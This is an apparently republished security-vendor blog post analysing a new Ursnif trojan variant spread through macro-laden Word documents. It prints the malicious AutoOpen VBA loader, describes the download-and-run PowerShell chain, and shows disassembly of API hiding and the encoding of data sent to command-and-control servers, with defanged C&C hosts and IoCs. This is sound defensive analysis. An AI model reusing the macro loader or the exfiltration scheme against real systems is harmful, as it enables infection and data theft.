{"id":16011,"date":"2019-08-07T09:40:08","date_gmt":"2019-08-07T17:40:08","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/08\/07\/news-9755\/"},"modified":"2019-08-07T09:40:08","modified_gmt":"2019-08-07T17:40:08","slug":"news-9755","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/08\/07\/news-9755\/","title":{"rendered":"New Ursnif Variant Spreading by Word Document"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i>Breaking FortiGuard Labs Threat Research<\/i><\/p>\n<p><i><br \/> \u00a0NOTE: This threat is actively spreading. During my analysis, which started with just a few samples, the volume of captured samples and the number of triggers this new variant set off in our global network of sensors kept growing. Because of this, we highly recommend that organizations stay alert to this currently expanding threat.<\/i><\/p>\n<p>Recently, FortiGuard Labs captured a number of Word documents from the wild, which were spreading a new variant of the Ursnif trojan.<\/p>\n<p>I did some research on this new variant, and in this blog I will present what it does on a victim\u2019s machine and what kinds of techniques it uses. 
The Ursnif trojan, also known as Dreambot, Gozi, and ISFB, has been around for years and focuses on stealing information from a victim\u2019s machine.<\/p>\n<h2>Word Sample Analysis<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image.img.png\" alt=\"Ursnif Word Document sample content\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. The Word sample content<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>These infected Word documents contain malicious VBA code. In this campaign, the file names of the Word documents follow the format \u201cinfo_[date].doc\u201d. The sample in this analysis is named info_07.25.doc.<\/p>\n<p>When a victim opens the Word document, Word displays a security warning designed to protect users from malicious macros (VBA code). However, the document content deceives victims into clicking the \u201cEnable Content\u201d button, as shown in Figure 1. 
When the button is clicked, the malicious VBA code runs right away, because it sits in an AutoOpen sub that Word executes when the document is opened.<\/p>\n<p>The malicious code is simple, as shown below:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">Sub AutoOpen()<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set fPzzMCZTdBHCipC = <\/span><span style=\"color: red; background: #D9D9D9;\">ymwsrw<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set KiVsBKglbMn = fPzzMCZTdBHCipC.<\/span><span style=\"color: red; background: #D9D9D9;\">Controls<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; KKzPMDRPhZsJz = KiVsBKglbMn(2) + KiVsBKglbMn(0)<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set PhFMwPKBcLcsm = VBA.<\/span><span style=\"color: red; background: #D9D9D9;\">GetObject<\/span><span style=\"color: black; background: #D9D9D9;\">(KiVsBKglbMn(100 - 90 - 9).Text)<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: normal;\"><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PhFMwPKBcLcsm.<\/span><span style=\"color: red; background: #D9D9D9;\">Run<\/span><span style=\"color: black; background: 
! KKzPMDRPhZsJz">
#D9D9D9;\">! KKzPMDRPhZsJz, 0 + 7596<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><em><span style=\"color: black; background: #D9D9D9;\">End Sub<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The rest of the code is read from three controls on a UserForm named \u201cymwsrw\u201d. The macro assembles PowerShell code from the Text properties of those controls and executes it. Figure 2 shows how that PowerShell code is transformed.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_1016213183.img.png\" alt=\"Executing the PowerShell code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Executing the PowerShell code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The first part is the original PowerShell command that the VBA code generates. As you can see, it is Base64 encoded (-Enc is short for -EncodedCommand). The second part shows the command after Base64 decoding; it still contains Base64 encoded data. The script decodes that data and then decompresses it to obtain the final PowerShell code shown in the bottom part of Figure 2.<\/p>\n<p>Going through the final code, it downloads a file from a URL (underlined in red) into the \u201c$Env:UserProfile\u201d folder and eventually starts it by calling \u201c[Diagnostics.Process]::STaRt($UpwpWW)\u201d. 
Of course, results may vary, as the captured Word samples use many different URLs to download Ursnif.<\/p>\n<p>Regardless, the downloaded executable file is a variant of Ursnif, and the Word document sample is an Ursnif downloader.<\/p>\n<h2>Start Downloaded Ursnif<\/h2>\n<p>By checking the downloaded file, we learned that it had been compiled on July 25<sup>th<\/sup>, 2019. When it starts, it dumps several dynamic code blocks into its memory and executes them. One of them is the main module that performs all of Ursnif\u2019s work.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_1899232419.img.png\" alt=\"Extracted Ursnif Main module\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. Extracted Ursnif Main module<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>In Figure 3, the data portion of the malware shows the file header of the decompressed Main module. It\u2019s a little tricky here: the header has neither the DOS magic word \u201cMZ\u201d that should appear in the first red rectangle nor the PE header magic word \u201cPE\u201d that should be in the second rectangle. Ursnif removed these magic words to avoid being identified, but it knows how to load this module without them.<\/p>\n<p>It then loads every section of the PE structure into newly allocated memory, repairs the relocation data, and resolves the API functions listed in the import table. When everything is ready, it calls the OEP (Original Entry Point) of the main module. 
The process is just like what a packer does.<\/p>\n<h2>Anti-Analysis in Main Module of Ursnif<\/h2>\n<p>Ursnif uses several anti-analysis techniques to make it harder to analyze. For example, it hides some API functions, which are resolved dynamically each time they are called, so that static analysis is difficult; and most data in the main module (in the \u201c.bss\u201d section of the PE structure) is encrypted and only gets decrypted at runtime. Let\u2019s take a look at the details.<\/p>\n<p>Ursnif registers a vectored exception handler by calling the API RtlAddVectoredExceptionHandler, whose second parameter points to the handler function. When the process runs into any exception, the system calls this handler function first. Figure 4 shows the pseudo code for that.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_38913304.img.png\" alt=\"Register exception handler function\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.  Register exception handler function<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Ursnif uses the exception handler function to decrypt the data in the \u201c.bss\u201d section. To do this, it changes the memory protection of the pages holding the \u201c.bss\u201d section, where the encrypted data lives, to <b>PAGE_NOACCESS<\/b> (0x1). 
Therefore, when Ursnif reads data in this area, an <b>access violation<\/b> exception (Exception Code C0000005) is raised and the exception handler function gets called.<\/p>\n<p>Figure 5 is a screenshot taken just after Ursnif has decrypted the data in the \u201c.bss\u201d section. This section\u2019s size is 1000H. Most constant strings and API names live here and are used throughout Ursnif\u2019s lifetime.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_2005121945.img.png\" alt=\"Part of decrypted \u201c.bss\u201d data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.  Part of decrypted \u201c.bss\u201d data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>A number of key APIs are hidden in the main module. When Ursnif needs to call one of them, it calls a function named \u201cAPI_Finder\u201d, which dynamically loads the DLL the API belongs to and locates the API in it by calling LoadLibrary and then GetProcAddress.<\/p>\n<p>The API name strings come from the decrypted \u201c.bss\u201d section, where they are stored in a structure of strings and offsets. \u201cAPI_Finder\u201d locates an API name by its offset. 
Here is the ASM code snippet when using API_Finder to get API \u201cCloseClipboard\u201d from \u201cUser32.dll\u201d.<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D27 &nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">sub_C9D27 proc near <\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D27&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; eax, offset <\/span><strong><span style=\"color: red; background: #D9D9D9;\">off_CC100<\/span><\/strong><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D2C&nbsp;&nbsp;&nbsp; jmp&nbsp;&nbsp;&nbsp;&nbsp; $+5<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31 loc_C9D31:<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D31&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; ecx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D32&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; edx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D33&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; eax&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; API function index<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: 
#D9D9D9;\">000C9D34&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset dword_CB2F4 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; dll name, 0CB150-&gt; &#8220;User32.dll&#8221;<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D39&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">call&nbsp;&nbsp;&nbsp; API_Finder<\/span><\/strong><span style=\"color: black; background: #D9D9D9;\"> &nbsp;&nbsp;<\/span><span style=\"color: #2818f4; background: #D9D9D9;\">;It calls LoadLibrary and GetProcAddress. The API is in eax.<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D3E&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp; edx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D3F&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp; ecx<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D40&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">jmp&nbsp;&nbsp;&nbsp;&nbsp; eax<\/span><\/strong><span style=\"color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; calls the API function<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">000C9D40 <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">sub_C9D27 endp<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>\u201cAPI_Finder\u201d obtains the API function index (It\u2019s 0xCC100 here) from its second argument, from which the \u201cAPI_Finder\u201d can compute the offset of the string \u201cCloseClipboard\u201d. 
The first argument to \u201cAPI_Finder\u201d points to a structure with a library name. The entry point of \u201cCloseClipboard\u201d is returned in \u201ceax\u201d, which is finally called through the jmp eax.<\/p>\n<h2>Using a COM Instance to Send Data to the C&amp;C<\/h2>\n<p>If you keep an eye on the process list in Task Manager while Ursnif runs, you will see many \u201ciexplore.exe\u201d processes appear and disappear from time to time, and a lot of traffic leaving \u201ciexplore.exe\u201d. That is how Ursnif sends collected data out of the victim\u2019s system. It does not create the \u201ciexplore.exe\u201d process directly; COM (Component Object Model) does, because Ursnif creates a COM instance by calling the API \u201cCoCreateInstance\u201d, which is one of the hidden API functions. This is the ASM code snippet that calls it.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E0B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; jz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; loc_C3E98<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E11&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push&nbsp;&nbsp;&nbsp; esi<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset rrid <\/span><span style=\"color: #2818f4; background: 
#D9D9D9;\">; {EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E17&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; 4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; dwClsContext<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E19&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; pUnkOuter<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E1B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; offset rclsid <\/span><span style=\"color: #2818f4; background: #D9D9D9;\">; {0002DF01-0000-0000-C000-000000000046}<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E20&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><strong><span style=\"color: red; background: #D9D9D9;\">call&nbsp;&nbsp;&nbsp; ds:CoCreateInstance<\/span><\/strong><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">seg000:000C3E26&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; test&nbsp;&nbsp;&nbsp; eax, eax<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">[&hellip;]<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn 
aem-GridColumn--default--12\">\n<p>The first argument is a GUID, \u201c{0002DF01-0000-0000-C000-000000000046}\u201d, which is the CLSID of \u201cInternet Explorer\u201d. The fourth argument is an interface ID, \u201c{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\u201d, which identifies the \u201cIWebBrowser\u201d interface. The same COM object can also be created from the string ID \u201cInternetExplorer.Application\u201d.<\/p>\n<p>The interface \u201c<a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/shdocvw.iwebbrowser?view=dynamics-usd-3\">IWebBrowser<\/a>\u201d implements a variety of methods that expose what the MS IE browser can do with web sites, such as GoBack(), GoHome(), Navigate(), Refresh(), and so on. COM starts \u201ciexplore.exe\u201d and then loads the \u201cIWebBrowser\u201d interface, whose methods are then ready to be called. Ursnif uses the Navigate() method, whose first argument is a URL string, to send collected data to its C&amp;C server.<\/p>\n<p>Ursnif keeps compressed configuration data in the \u201c.reloc\u201d section of the main module. Decompressing it yields the data structure shown in Figure 6.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_603866693.img.png\" alt=\"Decompressed configuration data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6.  
Decompressed configuration data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>At the bottom, you may notice that the C&amp;C host list includes &quot;microsoft.com&quot;, &quot;update.microsoft.com&quot;, &quot;avast.com&quot;, &quot;cdevinoucathrine.info&quot;, &quot;zcei60houston.club&quot; and &quot;kenovella.club&quot;. This seems odd. Why are \u201cmicrosoft\u201d and \u201cavast\u201d hosts listed here? In fact, this is a way to deceive researchers who capture and analyze the traffic.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image_596506425.img.png\" alt=\"Format of collected information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7.  Format of collected information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The code snippet in Figure 7 allows Ursnif to format the information collected from the victim\u2019s system. 
One formatted string looks like this:<br \/> \u00a0<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><span style=\"color: red; background: #D9D9D9;\">soft<\/span><span style=\"color: black; background: #D9D9D9;\">=3&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">version<\/span><span style=\"color: black; background: #D9D9D9;\">=214082&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">user<\/span><span style=\"color: black; background: #D9D9D9;\">=0364812000299edca18c7b9e8ed0ab6d&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">server<\/span><span style=\"color: black; background: #D9D9D9;\">=12&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">id<\/span><span style=\"color: black; background: #D9D9D9;\">=3387&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">crc<\/span><span style=\"color: black; background: #D9D9D9;\">=1&amp;<\/span><span style=\"color: red; background: #D9D9D9;\">uptime<\/span><span style=\"color: black; background: #D9D9D9;\">=2193<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<ul>\n<li>\u201csoft\u201d and \u201cversion\u201d are constant.<\/li>\n<li>\u201cuser\u201d is a sort of unique user ID. It consists of four DWORDs that were computed from a hash-code of the victim\u2019s User Name and Computer Name, as well as its CPU ID.<\/li>\n<li>\u201cserver\u201d and \u201cid\u201d are from the decompressed configuration data. They are behind the host strings, 3387 and 12, in Figure 6.<\/li>\n<li>\u201ccrc\u201d is another constant of 1.<\/li>\n<li>\u201cuptime\u201d is a time value that tells the attacker the uptime since the victim\u2019s system started.<\/li>\n<\/ul>\n<p>\u00a0Ursnif encodes the above strings using Base64, which will then be a part of a URL. 
It also replaces several characters in the encoded string with an underscore followed by their hex value (for example, \u201c+\u201d becomes \u201c_2B\u201d and \u201c\/\u201d becomes \u201c_2F\u201d). After that, it inserts a random number of \u201c\/\u201d characters and adds the prefix \u201c\/images\/\u201d and the suffix \u201c.avi\u201d to make the URL look normal.<\/p>\n<p>Now the collected data is almost ready to be sent to the C&amp;C server. As I said before, there are six host strings in the decompressed configuration. Ursnif picks one of them and builds a complete URL from that host and the encoded string above. That URL becomes the first argument of the method &quot;IWebBrowser.Navigate()&quot;. After a 20 second wait, it picks the next host string. Below is an example of a URL that will be sent to the C&amp;C server.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 6pt; line-height: 115%;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/<strong>cdevinoucathrine.info<\/strong><\/span><span style=\"color: red; background: #D9D9D9;\">\/images\/<\/span><span style=\"color: black; background: #D9D9D9;\">SZmbQhNDM\/NRU9kkrJ9pgbhJ0ElLjX\/GmdR4KRmiqx7Vh8d_2B\/e89HXjxRxOy7vuzb_2F1OA\/xM3INQh  D3eZsE\/D_2Fiv5c\/ju_2Bs3XEZzWGZSfnBvVAvj\/9xxBpMO3_2\/BGf9ybUt5cslyUgIK\/_2BnKRHLrDUUyi44DVzf\/T<\/span><span style=\"color: red; background: #D9D9D9;\">.avi<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This is a host list of C&amp;C servers that I extracted from two variants:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/cdevinoucathrine.info<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span 
style=\"color: black; background: #D9D9D9;\">hxxps:\/\/zcei60houston.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/kenovella.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/z76johnson.club<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/s75eagtyec.com<\/span><\/p>\n<p style=\"margin: 0in 0in 2pt; line-height: normal;\"><span style=\"color: black; background: #D9D9D9;\">hxxps:\/\/s97pe2360.club<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>So far, these are all of my findings for this Ursnif variant. I will continue to monitor this campaign for more details.<\/p>\n<h2>Solution:<\/h2>\n<p>This malicious Word document has been detected as \u201c<b>VBA\/Agent.A329!tr.dldr<\/b>\u201d by the FortiGuard AntiVirus service. 
The CDR (Content Disarm &amp; Reconstruction) feature in FortiGate and FortiMail can also neutralize this threat by removing all malicious VBA code.<\/p>\n<p>The downloaded file has been detected as \u201c<b>W32\/Ursnif.AHSY!tr<\/b>\u201d by the FortiGuard AntiVirus service.<\/p>\n<p>The URL used to download Ursnif has been rated as \u201c<b>Malicious Websites<\/b>\u201d by the FortiGuard WebFilter service.<\/p>\n<h2>IoC:<\/h2>\n<p><b>URL:<br \/> <\/b>&quot;hxxp:\/\/npkf32ymonica.com\/sywo\/fgoow.php?l=joow8.gxl&quot;<\/p>\n<p><b>Sample SHA256:<br \/> <\/b>info_07.25.doc:<\/p>\n<p>AAA7758D75967D28847B3CB8A9B3E3032F31EC45D12C9904A7BC98C189726005<\/p>\n<p>Downloaded executable file:<br \/> AAC9D2D21F634157EB8D3867A2C72042A83CABC3F0142B12763312F5A0B0A83A<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.\u00a0<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/gB4h2sgbiiQ\/ursnif-variant-spreading-word-document.html\" 